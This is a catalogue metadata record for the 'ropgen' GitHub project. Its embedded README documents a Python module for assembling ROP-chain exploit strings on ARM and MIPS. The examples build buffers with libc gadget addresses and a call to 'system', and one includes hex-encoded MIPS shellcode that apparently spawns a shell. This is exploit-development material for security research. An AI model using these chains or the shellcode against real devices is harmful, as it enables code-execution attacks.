{"id":37073278,"url":"https://github.com/extremecoders-re/ropgen","last_synced_at":"2026-01-14T08:36:05.782Z","repository":{"id":57462647,"uuid":"96391878","full_name":"extremecoders-re/ropgen","owner":"extremecoders-re","description":"A python module to facilitate in the generation of rop string for ARM and MIPS .","archived":false,"fork":false,"pushed_at":"2019-08-09T06:33:48.000Z","size":10,"stargazers_count":5,"open_issues_count":0,"forks_count":2,"subscribers_count":1,"default_branch":"master","last_synced_at":"2025-10-26T19:35:59.854Z","etag":null,"topics":["arm","exploitation","mips","python","rop","rop-exploitation","rop-gadgets"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/extremecoders-re.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2017-07-06T05:30:53.000Z","updated_at":"2024-11-16T19:56:35.000Z","dependencies_parsed_at":"2022-09-05T15:41:04.995Z","dependency_job_id":null,"html_url":"https://github.com/extremecoders-re/ropgen","commit_stats":null,"previous_names":[],"tags_count":1,"template":false,"template_full_name":null,"purl":"pkg:github/extremecoders-re/ropgen","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/extremecoders-re%2Fropgen","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/extremecoders-re%2Fropgen/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/extremecoders-re%2Fropgen/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/extremecoders-re%2Fropgen/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/
owners/extremecoders-re","download_url":"https://codeload.github.com/extremecoders-re/ropgen/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/extremecoders-re%2Fropgen/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":28414557,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-01-14T08:31:27.429Z","status":"ssl_error","status_checked_at":"2026-01-14T08:31:19.098Z","response_time":107,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["arm","exploitation","mips","python","rop","rop-exploitation","rop-gadgets"],"created_at":"2026-01-14T08:36:05.054Z","updated_at":"2026-01-14T08:36:05.767Z","avatar_url":"https://github.com/extremecoders-re.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Ropgen\n\nA Python module that facilitates the generation of ROP chain exploit strings, especially for the ARM and MIPS architectures.\n\nAfter we have found the gadgets that will be used in the ROP chain, we need to lay them out. The gadgets need to be placed at specific offsets within the exploit string, with filler bytes separating them.\n\nThis Python module assists in the creation of such ROP strings. You can build the string by specifying the offsets and the value that will be placed at each offset. 
A value can be a byte, word, double word, quad word or string.\n\nAdditionally, you can summarize the generated ROP string in the form of a nice ASCII table.\n\n# Installation\n\nRopgen is available on PyPI. \n\n[![PyPI version](https://badge.fury.io/py/ropgen.svg)](https://badge.fury.io/py/ropgen)\n\nTo install systemwide (requires root privileges):\n\n```\n# pip install ropgen\n```\n\nOr, to do a local install to the user's home directory (doesn't require root):\n\n```\n$ pip install --user ropgen\n```\n\n## Example-1\n\n```python\n#!/usr/bin/env python2\nfrom ropgen import RopGen\n\nlibc = 0x2ab3e000\ngadget1 = 0x27eb4\nsleep = 0x2f2b0\nsystem = 0x2bfd0\ngadget2 = 0x267b0\ngadget3 = 0x171cc\n\n# endianness is le by default\nrop = RopGen()\nrop.set_dword(51, libc + gadget1, \"Gadget 1\")\nrop.set_dword(158, libc + sleep, \"sleep\")\nrop.set_dword(170, libc + system, \"system\")\nrop.set_dword(194, libc + gadget2, \"Gadget 2\")\nrop.set_dword(226, libc + gadget3, \"Gadget 3\")\nrop.set_string(254, \"id; \\x00\", \"Payload\")\n\nprint rop.build()\nprint rop.summarize()\n```\n\n**Output**\n\n```\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�^�*AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�Ҷ*AAAAAAAAП�*AAAAAAAAAAAAAAAAAAAA�G�*AAAAAAAAAAAAAAAAAAAAAAAAAAAA�Q�*AAAAAAAAAAAAAAAAAAAAAAAAid; \n+--------+---------------------+-----------------+\n| Offset | Content description | Length in bytes |\n+========+=====================+=================+\n| 0      | Padding Bytes       |       51        |\n+--------+---------------------+-----------------+\n| 51     | Gadget 1            |        4        |\n+--------+---------------------+-----------------+\n| 55     | Padding Bytes       |       103       |\n+--------+---------------------+-----------------+\n| 158    | sleep               |        4        |\n+--------+---------------------+-----------------+\n| 162    | Padding Bytes       |        8        
|\n+--------+---------------------+-----------------+\n| 170    | system              |        4        |\n+--------+---------------------+-----------------+\n| 174    | Padding Bytes       |       20        |\n+--------+---------------------+-----------------+\n| 194    | Gadget 2            |        4        |\n+--------+---------------------+-----------------+\n| 198    | Padding Bytes       |       28        |\n+--------+---------------------+-----------------+\n| 226    | Gadget 3            |        4        |\n+--------+---------------------+-----------------+\n| 230    | Padding Bytes       |       24        |\n+--------+---------------------+-----------------+\n| 254    | Payload             |        5        |\n+--------+---------------------+-----------------+\n```\n\n## Example-2\n\n```python\n#!/usr/bin/env python3\nfrom ropgen import RopGen\n\nlibc = 0x40854000\ngadget1 = libc + 0x000158dc\ngadget2 = libc + 0x00037690\ngadget3 = libc + 0x0000b830\ngadget4 = libc + 0x00040e18 + 4\nsleep = libc + 0x56bd0\n\nshell = bytes.fromhex('6269093c2f2f2935f4ffa9af7368093c6'\\\n\t'e2f2935f8ffa9affcffa0aff4ffbd2720'\\\n\t'20a003fcffa0affcffbd27ffff0628fcf'\\\n\t'fa6affcffbd232030a00373680934fcff'\\\n\t'a9affcffbd27ffff0528fcffa5affcffb'\\\n\t'd23fbff1924272820032028bd00fcffa5'\\\n\t'affcffbd232028a003ab0f02340c010101')\n\nrop = RopGen(endian='be', padding='B')\nrop.set_dword(260, sleep, \"sleep\")\nrop.set_dword(276, gadget2, \"gadget2\")\nrop.set_dword(292, gadget1 , \"gadget1\")\nrop.set_dword(296 + 0x24, gadget3, \"gadget3\")\nrop.set_dword(296 + 0x20, gadget4, \"gadget4\")\nrop.set_string(296 + 0x28 + 0xb8, shell, \"shellcode\")\nrop.build()\nprint(rop.summarize())\n```\n**Output**\n\n```\n+--------+---------------------+-----------------+\n| Offset | Content description | Length in bytes |\n+========+=====================+=================+\n| 0      | Padding Bytes       |       260       |\n+--------+---------------------+-----------------+\n| 260    | sleep 
              |        4        |\n+--------+---------------------+-----------------+\n| 264    | Padding Bytes       |       12        |\n+--------+---------------------+-----------------+\n| 276    | gadget2             |        4        |\n+--------+---------------------+-----------------+\n| 280    | Padding Bytes       |       12        |\n+--------+---------------------+-----------------+\n| 292    | gadget1             |        4        |\n+--------+---------------------+-----------------+\n| 296    | Padding Bytes       |       32        |\n+--------+---------------------+-----------------+\n| 328    | gadget4             |        4        |\n+--------+---------------------+-----------------+\n| 332    | gadget3             |        4        |\n+--------+---------------------+-----------------+\n| 336    | Padding Bytes       |       184       |\n+--------+---------------------+-----------------+\n| 520    | shellcode           |       116       |\n+--------+---------------------+-----------------+\n```\n\n# License\n\nLicensed under MIT.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fextremecoders-re%2Fropgen","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fextremecoders-re%2Fropgen","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fextremecoders-re%2Fropgen/lists"}